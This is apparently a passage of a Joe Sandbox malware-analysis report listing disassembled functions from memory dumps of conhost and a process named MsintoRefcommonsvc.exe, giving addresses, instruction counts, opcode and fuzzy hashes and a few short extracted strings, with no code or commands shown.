Uniqueness Score: -1.00%

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8229673e97c680ee4dce8c578dfc6a07848460caab31de8a390adc0cc8987ad8
Instruction ID: 604e8eab0fff240baab02a52dde92a2c2b34985aaff2f4fbe29a561d46454198
Opcode Fuzzy Hash: 8229673e97c680ee4dce8c578dfc6a07848460caab31de8a390adc0cc8987ad8
Instruction Fuzzy Hash: C311C635B0E68D8FE721EBA8C8611EC7BB0EF52711F1646F7C054DB2A3D97826468784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC65B6 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de3b2aa5826cdcb686297763705ce30c84ddffc36a04c72cd9f926e710300590
Instruction ID: 507035f616e457f551d24e66a63514fcd7b3e2d838dfea2db044ff2ead142236
Opcode Fuzzy Hash: de3b2aa5826cdcb686297763705ce30c84ddffc36a04c72cd9f926e710300590
Instruction Fuzzy Hash: E111A320E0D50D4FEBB8F758986A6B87391FF55700F1101B9D84DD72F2ED786E414681

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fecd32ed2b01d5bf63eafa9df5e2aaeb8beefb8edbb640ad9c4a76f7d9e63c
Instruction ID: 908235d3a5fb741d3eb4c538b3ab806e42c521e139c8c928cc47502163c722f5
Opcode Fuzzy Hash: 75fecd32ed2b01d5bf63eafa9df5e2aaeb8beefb8edbb640ad9c4a76f7d9e63c
Instruction Fuzzy Hash: 37010831A0E28C8FE721EB64C4600EC7FB0EF02710F0541F7C054DB2A3D93426458740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8252c0d25036c1797bbae1ea8728e0e497fe9854fd75f6c0be360e24c3de324a
Instruction ID: 406cf24ef9e1a19d8d83165e7496bdeb16d79f97123e97e53530c50537906ded
Opcode Fuzzy Hash: 8252c0d25036c1797bbae1ea8728e0e497fe9854fd75f6c0be360e24c3de324a
Instruction Fuzzy Hash: 99019235A0E28D9FD721EBA4C8501EC7FB0EF02714F1541E7D454DB2A3D97866458780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50634d78a157a460421486f3a5c31da60bf3d297ba0b86f9ec5ea0453f5dd14
Instruction ID: 3a5906f296585827d69e0354dc7ec11166627e8738112c41502414606bbd7094
Opcode Fuzzy Hash: b50634d78a157a460421486f3a5c31da60bf3d297ba0b86f9ec5ea0453f5dd14
Instruction Fuzzy Hash: 1E018F35E0E28D9FEB61EBA488A01ED7FB0EF02B14F1541E7D454DB2A3D9786A448740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC6685 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction ID: fc07970424e1dcbea1df599a6d61ac062c2c4cef04e3b2938a8aef15ee30e511
Opcode Fuzzy Hash: dd3845596c4327085e7b812ed148a093c9f00aa9766b84abd82ff29e7f96efc8
Instruction Fuzzy Hash: A5011230A4941E8FEB78FB54D8656F873A1FB54300F1101B9D44DD71B2DE786E828A05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC7258 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb72b6d050aebc9b51ee9a03f36b7b04d0ef95c2024fed6a65a6125f946f7d0
Instruction ID: 924afbda15b71ae801464e3324f9a34738c864d81d5cb8d7a57e8ba3ac215f3d
Opcode Fuzzy Hash: 9eb72b6d050aebc9b51ee9a03f36b7b04d0ef95c2024fed6a65a6125f946f7d0
Instruction Fuzzy Hash: 19E01221F0941E4BF7B4BB54C8A07B961A1AF98300F1201B4D54D933E2DDB86E408B45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0B95 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction ID: 026b09a6a4f4da5508b43d7b44857ce842712e40c2dc6883b32a556e26f3c933
Opcode Fuzzy Hash: 04d912cce1882ab70d92727893cd92ef9cb98564b3ceceef573e0c620fa50dcd
Instruction Fuzzy Hash: 71D0A73061994E4FC645B778C8594347BA0FB0F210BC510E5E00CC7562C54848558704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction ID: e3045f3b61f968f1555210a6a8038fd5e137379a3cec17ef8a4b8ad0606bc118
Opcode Fuzzy Hash: aa3e88ead1a5968ade0eab6eeff9c87bbbb2a8a6dba60173493ab4d5c8c8aeec
Instruction Fuzzy Hash: 95C08C00F0B40F00F8313BEE14220BCB1005BC4B10FD30132D01C820E19CDE22C6024E

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC12B0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction ID: 1273e137ada63332140c00af633b5ea27683e3195e0ed9a83fef630d4d4ff4b6
Opcode Fuzzy Hash: e72a1dd12a1fa5ad6107b0b1f5d18ee6a3dff9ded8a12d14089a41ed64f2f248
Instruction Fuzzy Hash: DBC08C3051580C8FC908FB29C88882433A0FB09315BC20090E008C7174D259DCC0C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction ID: e1446733931ed35675c2e6df3c92b15c966bad7455f7b2bdcb6e2d17c7175b25
Opcode Fuzzy Hash: 74f9ae3dc107e225bd3989dbdbb68dc79b92d57736b24654e32bc5322a855044
Instruction Fuzzy Hash: 07B01200D5740F00E83433FA085207DB0405B44200FC20170D40D81091DCCE1295034A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC25F3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction ID: b97924dfbb52b9557425332600cf37dc10518aaf35791aebf41c258d5909e129
Opcode Fuzzy Hash: cd5382d58ee3f1554fd1ae4c018962395e7343b6992d843b74c670da6b60efd0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

c9, xrefs: 00007FFD9BAC0B56
#{9, xrefs: 00007FFD9BAC0B3E
"s9, xrefs: 00007FFD9BAC0B46
!k9, xrefs: 00007FFD9BAC0B4E

Memory Dump Source

Source File: 00000020.00000002.2079644016.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ffd9bac0000_conhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 2ab75b4da1fd893ecfb8c9a1ffb6cff00c4fcfd19980a150f21035021fd31a39
Instruction ID: 23dbba2ee6ccbf2410e19b9314e7e30c152bc661ee68997c98266cac42ff614f
Opcode Fuzzy Hash: 2ab75b4da1fd893ecfb8c9a1ffb6cff00c4fcfd19980a150f21035021fd31a39
Instruction Fuzzy Hash: EF414B06B0A56A45E32977FD78219FD6B448FA923FB0843B7F85E8E1D74C486085C2E9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MsintoRefcommonsvc.exePID: 7224, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAB06AE Relevance: 2.6, Strings: 1, Instructions: 1343COMMON

Download Yara Rule

Strings

!N_H, xrefs: 00007FFD9BAB1AC1

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: !N_H
API String ID: 0-116015028
Opcode ID: fbe79ccbb1fd3163d38689e84937106d35d17fd375cc77a4dd810cca20f4b219
Instruction ID: 6648329efc65f2800eda702cab2a3cce50ee9b5ba02c78d5add4975797a8e118
Opcode Fuzzy Hash: fbe79ccbb1fd3163d38689e84937106d35d17fd375cc77a4dd810cca20f4b219
Instruction Fuzzy Hash: C892D331B1991E4FEBA8EB5884A16B873D2FFA8750F1541B9D01DC32D7DE78AE418B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAB088F Relevance: 2.5, Strings: 1, Instructions: 1275COMMON

Download Yara Rule

Strings

!N_H, xrefs: 00007FFD9BAB1AC1

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bab0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: !N_H
API String ID: 0-116015028
Opcode ID: 3836ce85c4715bcd48c194581176509cf51fab0430413ab07efebd60013933a8
Instruction ID: f8ee1392cabacf4c68ace8a983eb78c0677155376cdd9686b6947176b7d79e37
Opcode Fuzzy Hash: 3836ce85c4715bcd48c194581176509cf51fab0430413ab07efebd60013933a8
Instruction Fuzzy Hash: 7F92C621B1991D4FEBB8EB6884A177873D2FFA8740F1541B9D01DC32D6DE78AE428B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: c43841b12ce91250242f8c1a6c95d7cbd1ab7c2ee8694a513ce719224aa174b1
Instruction ID: 3388ce21f7e8802a007706044972c151e50c488268d54ad6b7e52f178cdc57fc
Opcode Fuzzy Hash: c43841b12ce91250242f8c1a6c95d7cbd1ab7c2ee8694a513ce719224aa174b1
Instruction Fuzzy Hash: 55914571A19A8D4FE798DF6888657A87BE1FF99714F0001BED05DD73E6CBB829018740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADA3F9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADA416

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: f444278c7740957c734b5261f788a1cac52594fe00eac162bf6890281e55bf8f
Instruction ID: 4bb9a5e80b5d330f612c61f08a25994e7e0641310b1404b27c02c21585d21366
Opcode Fuzzy Hash: f444278c7740957c734b5261f788a1cac52594fe00eac162bf6890281e55bf8f
Instruction Fuzzy Hash: 5DE0923060A3844FCB1AEB3484698547FB0EF6721134A42EFC445CF1A7DA2DC889CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD3709 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAD3726

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 97e1288d1115e7da629805e34262cd4e4202bc262c076fd920c1817e2347db71
Instruction ID: b3b7a65e7e0957f65f742cb8552e17f1f4c349f65007326f70c9638cf0d56a5e
Opcode Fuzzy Hash: 97e1288d1115e7da629805e34262cd4e4202bc262c076fd920c1817e2347db71
Instruction Fuzzy Hash: 34E06D6160E7C44FDB1AEB348869454BFA0EF6720174A52EEC045CF1A3EA2D8889C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADA489 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BADA4A6

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 833e3d7326e08707a89f94208855a60bfbc516b22732d3ef287a87a39ae3748a
Instruction ID: 3cb70283bae035121181328ae0dac307bd13aa00a4e5e3cbf5adf2c130a085a7
Opcode Fuzzy Hash: 833e3d7326e08707a89f94208855a60bfbc516b22732d3ef287a87a39ae3748a
Instruction Fuzzy Hash: FAE06D7160F7C84FD71AAA348869454BFA0EF6721174A42EEC045CF1A3EA2D8889C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD2479 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9BAD2496

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d7785645438b51b63fc922a3345057d705d8d3cd7b049d9f3f426627eaf88a40
Instruction ID: 22844865cb022d4fe92d67cdd448815a6713c6ca462cad31776a8239a2e4b047
Opcode Fuzzy Hash: d7785645438b51b63fc922a3345057d705d8d3cd7b049d9f3f426627eaf88a40
Instruction Fuzzy Hash: B4E0ED6164E3C44FCB1AAA748868455BF61EF6721174A51EEC146CF2A7EA2D8889C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD4559 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD4576

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: bdd36aabd6626ced3203ac5b272706ef929d7d85bfde5a4175c892f383a7ce6e
Instruction ID: 0107ff6eee678e7bb224da57122bb1f92fa0a680875d6c1b74bbf0c21a10e673
Opcode Fuzzy Hash: bdd36aabd6626ced3203ac5b272706ef929d7d85bfde5a4175c892f383a7ce6e
Instruction Fuzzy Hash: B0E01A6694B3C44FCB16EB7888A59843FA0EE6721078B41EEC055CB1B3E62D984AC701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD80F9 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BAD8116

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 60aecd149dd7141012fa72b2e8dc4b4693a221043e12c6e05d9a9e18f2a1c31e
Instruction ID: ec77f3ac53d79f78c5b82c9f0aab656a8d9c09bf4492dc792b3bfc26ba5c989e
Opcode Fuzzy Hash: 60aecd149dd7141012fa72b2e8dc4b4693a221043e12c6e05d9a9e18f2a1c31e
Instruction Fuzzy Hash: D8E04F7154A3C44FCB0AEB7484658543FA0DE6B21078B40EEC146CF1B3E62D8949C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADACB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9BADACD6

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 293664ab008fca6a3f3432820db6348f3616da0b0fd14123e97a42a10f5f97a7
Instruction ID: d90509e4014986b2e80a3d698b7f420ec973cd18eceaa12dae3b7c53e912ad32
Opcode Fuzzy Hash: 293664ab008fca6a3f3432820db6348f3616da0b0fd14123e97a42a10f5f97a7
Instruction Fuzzy Hash: 9EE0E57154E7C44FCB16AB74886A9447FA0AE6721078A41EEC185CB1B3E6298849C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD3BD5 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f35e9017cb1b3e696cea9a964e52cbd58ce3a440c91109cacb298c511646a7
Instruction ID: 9c3562a20729565697c95bfc7365345fb36c6fedb6bfbd8aa5b01bf7f18d147b
Opcode Fuzzy Hash: 27f35e9017cb1b3e696cea9a964e52cbd58ce3a440c91109cacb298c511646a7
Instruction Fuzzy Hash: CE814721B1EA4E0FEBA8AB5884B67B873C1EFD8350F44427DE05DC71E7DD686A458380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD3C65 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6632fbb9b738a62800c6cff012d39094a25f07946e551d057a5206d3562a8a
Instruction ID: cc763023f75985f106e40ee1c27b564356787fbe51d39e44ca35cdff26061147
Opcode Fuzzy Hash: 8e6632fbb9b738a62800c6cff012d39094a25f07946e551d057a5206d3562a8a
Instruction Fuzzy Hash: DC511421B1DA4E0FEBA8FB6884727B872C2EF98314F404279E45EC71E7DD687A458740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f3b046cce2acad06353d725d1f1509c0b411a185cd98458c42d774cb043e84
Instruction ID: 1c2e9ff386397cab1b5cd97b3273318972f952bdd12a25ba19a0af772c3cd0de
Opcode Fuzzy Hash: 80f3b046cce2acad06353d725d1f1509c0b411a185cd98458c42d774cb043e84
Instruction Fuzzy Hash: 6B413822B0C5190EE354F76CA4A56F97781DF9933AB0401FBE44ECB1E7CE186941C294

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bea9ff5cea0d701c31f280cd9b5c5f5a7a733695de4e8712ef4dababd5eec05
Instruction ID: 397af899e4ddd4abd1d66ec637c01e47d39667fe50445597a0191d457ef73897
Opcode Fuzzy Hash: 1bea9ff5cea0d701c31f280cd9b5c5f5a7a733695de4e8712ef4dababd5eec05
Instruction Fuzzy Hash: F0216820B1DD1E0FE798F76C946A67972C3EF98321F0101B9E40EC32E7DD58AD418290

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA1171 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5419eedc368ed8e3b6c9fb424c37299125765701dc0570b7cd54128e2401328
Instruction ID: eb3d20b5c72684e9390e4a1a74bb3831d42c42f0faa338e47d224fe16be9f904
Opcode Fuzzy Hash: b5419eedc368ed8e3b6c9fb424c37299125765701dc0570b7cd54128e2401328
Instruction Fuzzy Hash: 5831B430A0D68A8FDB46EB64C8649A97FF1EF6A300B0902BBC049C71A2DA68A545C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd76f6c41224b3e41e27e451f92bf15da4b17d4b338ba73129773ecd11f7abaf
Instruction ID: a8876f168ad7128819f4255f7c6fd9117fc64b0a31c22683b88a41d026d5996c
Opcode Fuzzy Hash: cd76f6c41224b3e41e27e451f92bf15da4b17d4b338ba73129773ecd11f7abaf
Instruction Fuzzy Hash: 8B214936B0E24E4BE731ABB898610EC7B60EF82725F1545B3D05C8F1D3D978268AC764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA5D44 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7856f311dbd633c1216fed649c8d9c52512725d153fd75092fedb738c838a8df
Instruction ID: fbf38eea853d47f544cb857282044cbc8292bcab0a02955dcaaae518e988f7e9
Opcode Fuzzy Hash: 7856f311dbd633c1216fed649c8d9c52512725d153fd75092fedb738c838a8df
Instruction Fuzzy Hash: BD213D3091991D8FDBA8DB04C899BB8B3E2FB58301F5081A9D44ED36A1DE746AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA3F9C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9baa0000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05100c68fdc2f42d421a8bb1fbed838313e9c782f0b7f883cfe65760631fcd00
Instruction ID: 2439749d463ff6cb26aa282ec9fc9302d777dfecc69f92f3e16c32f3c811b539
Opcode Fuzzy Hash: 05100c68fdc2f42d421a8bb1fbed838313e9c782f0b7f883cfe65760631fcd00
Instruction Fuzzy Hash: 6C113321F0D90D4FFAF4E7A8846967812D3DFA5710F0A41B5D44EC72F2DCA8AD418714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD2BF8 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2136439655.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ffd9bad1000_MsintoRefcommonsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 822f636f8d06a4e0e436b22a9b27a1265012280832c39e15a6d40a7fbe1ddad4
Instruction ID: f2f1c33733e14255ec72a10ec210b9d8a8264e366e2f9b13f618dfffce23bede
Opcode Fuzzy Hash: 822f636f8d06a4e0e436b22a9b27a1265012280832c39e15a6d40a7fbe1ddad4
Instruction Fuzzy Hash: BB11D631B0DA194FEBB8EB98C4A1AB873A1EFD8354F410379D419C32E5CE686E44C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

